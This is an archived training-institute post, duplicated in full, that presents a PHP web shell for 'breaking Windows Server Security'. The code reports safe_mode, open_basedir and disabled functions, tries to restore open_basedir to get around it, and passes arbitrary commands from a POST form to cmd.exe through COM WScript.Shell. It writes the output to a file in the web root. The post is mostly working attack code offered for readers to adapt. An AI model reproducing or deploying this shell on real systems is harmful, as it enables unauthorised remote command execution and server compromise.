| Filename | Breaking Windows Server Security through PHP |
| Permission | rw-r--r-- |
| Author | Unknown |
| Date and Time | 7/16/2013 |
| Label | Penetration |
| Action |
Ethical Hacking Institute in Pune
./Arizona Team
Hello everyone, continuing to the part of website security today we are going to see how we can break Windows Server Security through a simple PHP code.
Go through the logical flow of the code and try to understand the logic behind the code, then create a new one for yourself. If you find any difficulty while going through the logical flow of the PHP code you can shoot your questions at instructor@arizonainfotech.com.
Here is the PHP Code:
<body bgcolor=black>
<center><font color=green>Team Arizona Server Security Breaker<font></center>
<div align="center"><center>
<table width="558" height="560" border="1" id="AutoNumber1">
<tr>
<td width="49%" height="158"><p><?php
//is safe mod on ? start
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safe="<font color=red>ON</font>";
}
else {$safe="<font color=green>OFF</font>";}
echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>";
//open safe mod end--
?>
<p>
<?php
//is open basedir on ? start
$n = @ini_get('open_basedir');
if (!empty($n))
{
$base = @ini_restore("open_basedir");
}
else {$base="<font color=green>NONE</font>";}
echo "<font color=whitepurple>OPEN_BASEDIR :</font><b>$base</b><br>";
//open basedir end--
?>
<p align="left">
<?php
//disable function start
echo "<font color=whitepurple>Disable functions :</font> <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
//disable function end--
?>
<p align="left">
<?php
//phpver start
$phpver=phpversion();
echo "<font color=whitepurple>PHP Version :</font><font color=red><b>$phpver</b></font><br>";
//phpver end--
?>
<p align="left">
<?php
//path of win
$dir = @getcwd();
echo "<font color=whitepurple>U'Re In :</font><font color=red><b>$dir</b></font><br>";
//end
?>
<?php
print "<form method=post>";
print "<b><font color=white>cmd:</b></font><input size=50 name='command' value=''>";
print "<br>";
print "<b><font color=white>file :</b></font><input size=50 name='file' value=''>";
print "<br>";
print "<input type=submit name=_act value='Execute!'>";
$post = $_POST['command'];
$file = $_POST['file'];
?>
<?php
$_file = new COM("WScript.Shell");
$_file ->Run('cmd.exe /c'.$post.' > '.dirname($_SERVER[SCRIPT_FILENAME]).'/'.$file.'');
?>
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE
./Arizona Team
Hello everyone, continuing to the part of website security today we are going to see how we can break Windows Server Security through a simple PHP code.
Go through the logical flow of the code and try to understand the logic behind the code, then create a new one for yourself. If you find any difficulty while going through the logical flow of the PHP code you can shoot your questions at instructor@arizonainfotech.com.
Here is the PHP Code:
<body bgcolor=black>
<center><font color=green>Team Arizona Server Security Breaker<font></center>
<div align="center"><center>
<table width="558" height="560" border="1" id="AutoNumber1">
<tr>
<td width="49%" height="158"><p><?php
//is safe mod on ? start
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safe="<font color=red>ON</font>";
}
else {$safe="<font color=green>OFF</font>";}
echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>";
//open safe mod end--
?>
<p>
<?php
//is open basedir on ? start
$n = @ini_get('open_basedir');
if (!empty($n))
{
$base = @ini_restore("open_basedir");
}
else {$base="<font color=green>NONE</font>";}
echo "<font color=whitepurple>OPEN_BASEDIR :</font><b>$base</b><br>";
//open basedir end--
?>
<p align="left">
<?php
//disable function start
echo "<font color=whitepurple>Disable functions :</font> <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
//disable function end--
?>
<p align="left">
<?php
//phpver start
$phpver=phpversion();
echo "<font color=whitepurple>PHP Version :</font><font color=red><b>$phpver</b></font><br>";
//phpver end--
?>
<p align="left">
<?php
//path of win
$dir = @getcwd();
echo "<font color=whitepurple>U'Re In :</font><font color=red><b>$dir</b></font><br>";
//end
?>
<?php
print "<form method=post>";
print "<b><font color=white>cmd:</b></font><input size=50 name='command' value=''>";
print "<br>";
print "<b><font color=white>file :</b></font><input size=50 name='file' value=''>";
print "<br>";
print "<input type=submit name=_act value='Execute!'>";
$post = $_POST['command'];
$file = $_POST['file'];
?>
<?php
$_file = new COM("WScript.Shell");
$_file ->Run('cmd.exe /c'.$post.' > '.dirname($_SERVER[SCRIPT_FILENAME]).'/'.$file.'');
?>
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE